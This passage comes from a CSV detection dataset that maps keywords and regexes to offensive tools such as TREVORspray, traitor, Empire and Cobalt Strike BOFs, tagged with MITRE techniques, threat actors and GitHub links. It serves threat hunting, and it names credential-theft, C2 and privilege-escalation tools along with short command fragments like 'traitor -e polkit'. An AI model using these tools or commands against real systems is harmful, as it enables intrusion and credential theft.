Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","61517" "*TorPylle*",".{0,1000}TorPylle.{0,1000}","offensive_tool_keyword","TorPylle","A Python / Scapy implementation of the OR (TOR) protocol.","T1573 - T1572 - T1553 - T1041 - T1090","TA0002 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/cea-sec/TorPylle","1","0","N/A","N/A","N/A","1","98","21","2021-10-03T18:08:41Z","2013-07-23T11:38:39Z","61518" "*TorServiceSetup*",".{0,1000}TorServiceSetup.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","0","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","61519" "*torsocks:amd64*",".{0,1000}torsocks\:amd64.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","61520" "*Total number of passwords to test: *",".{0,1000}Total\snumber\sof\spasswords\sto\stest\:\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","61521" "*totally legit pdf.pdf*",".{0,1000}totally\slegit\spdf\.pdf.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","61522" "*totally-not-meterpreter.7z*",".{0,1000}totally\-not\-meterpreter\.7z.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","61523" "*tothi/dll-hijack-by-proxying*",".{0,1000}tothi\/dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","1","N/A","N/A","7","5","498","103","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z","61524" "*toto %3e c:\\temp\\toto.txt*",".{0,1000}toto\s\%3e\sc\:\\\\temp\\\\toto\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","61525" "*touch /tmp/pwnd*",".{0,1000}touch\s\/tmp\/pwnd.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#linux","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","61526" "*touch /tmp/shim-pwn-success*",".{0,1000}touch\s\/tmp\/shim\-pwn\-success.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","61527" "*tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq*",".{0,1000}tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","61532" 
"*trailofbits/onesixtyone*",".{0,1000}trailofbits\/onesixtyone.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","61533" "*trainr3kt/MemReader_BoF*",".{0,1000}trainr3kt\/MemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","61534" "*trainr3kt/Readfile_BoF*",".{0,1000}trainr3kt\/Readfile_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","N/A","10","10","21","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z","61535" "*traitor -a *",".{0,1000}traitor\s\-a\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61536" "*traitor --any *",".{0,1000}traitor\s\-\-any\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61537" "*traitor -e *",".{0,1000}traitor\s\-e\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61538" "*traitor -e polkit*",".{0,1000}traitor\s\-e\spolkit.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61539" "*traitor --exploit*",".{0,1000}traitor\s\-\-exploit.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61540" "*traitor -p *",".{0,1000}traitor\s\-p\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61541" "*traitor-amd64 upload*",".{0,1000}traitor\-amd64\supload.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61542" "*TransitPathName EvilPathName ServiceName start/stop\*",".{0,1000}TransitPathName\sEvilPathName\sServiceName\sstart\/stop\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#content","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","61543" "*translate.google.com/translate?&anno=2&u=$c2server*",".{0,1000}translate\.google\.com\/translate\?\&anno\=2\&u\=\$c2server.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - 
TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","61544" "*tree_connect_andx_request*",".{0,1000}tree_connect_andx_request.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","61545" "*trendmicro pass AV remove.bat*",".{0,1000}trendmicro\spass\sAV\sremove\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used in the Dispossessor ransomware group notes","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61546" "*Trevohack/DynastyPersist*",".{0,1000}Trevohack\/DynastyPersist.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","61547" "*TrevorC2*",".{0,1000}TrevorC2.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","N/A","10","10","1271","271","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z","61548" "*trevorproxy ssh*",".{0,1000}trevorproxy\sssh.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61549" "*trevorproxy subnet*",".{0,1000}trevorproxy\ssubnet.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61550" "*trevorsaudi/Mshikaki*",".{0,1000}trevorsaudi\/Mshikaki.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","61551" "*trevorspray -*",".{0,1000}trevorspray\s\-.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61552" "*trevorspray *--recon *",".{0,1000}trevorspray\s.{0,1000}\-\-recon\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61553" 
"*trevorspray -u *",".{0,1000}trevorspray\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61554" "*trevorspray.cli*",".{0,1000}trevorspray\.cli.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61555" "*trevorspray.enumerators*",".{0,1000}trevorspray\.enumerators.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61556" "*trevorspray.looters*",".{0,1000}trevorspray\.looters.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61557" "*trevorspray.py*",".{0,1000}trevorspray\.py.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 
- T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61558" "*trevorspray.sprayers*",".{0,1000}trevorspray\.sprayers.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61559" "*trevorspray/existent_users.txt*",".{0,1000}trevorspray\/existent_users\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61560" "*trevorspray/valid_logins.txt*",".{0,1000}trevorspray\/valid_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61561" "*TREVORspray-dev*",".{0,1000}TREVORspray\-dev.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61562" "*TREVORspray-master*",".{0,1000}TREVORspray\-master.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61563" "*TREVORspray-trevorspray*",".{0,1000}TREVORspray\-trevorspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61564" "*tricks01.hwtxt*",".{0,1000}tricks01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61565" "*trickster0/EDR_Detector*",".{0,1000}trickster0\/EDR_Detector.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","61566" "*trickster0/Enyx*",".{0,1000}trickster0\/Enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61567" "*trickster0/NamelessC2*",".{0,1000}trickster0\/NamelessC2.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","61568" "*trickster0/TartarusGate*",".{0,1000}trickster0\/TartarusGate.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - 
T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","61569" "*Troedx765nLiedx765nk*",".{0,1000}Troedx765nLiedx765nk.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","61570" "*Trojan:Win32/TurtleLoader.*",".{0,1000}Trojan\:Win32\/TurtleLoader\..{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","61619" "*TR-SLimey/wraith-RAT*",".{0,1000}TR\-SLimey\/wraith\-RAT.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","61639" "*TrU57(C00K13s)*",".{0,1000}TrU57\(C00K13s\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","61640" "*truecrypt2john.py*",".{0,1000}truecrypt2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61641" "*truerustyy/wcreddump*",".{0,1000}truerustyy\/wcreddump.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","61642" "*trufflehog filesystem *",".{0,1000}trufflehog\sfilesystem\s.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered 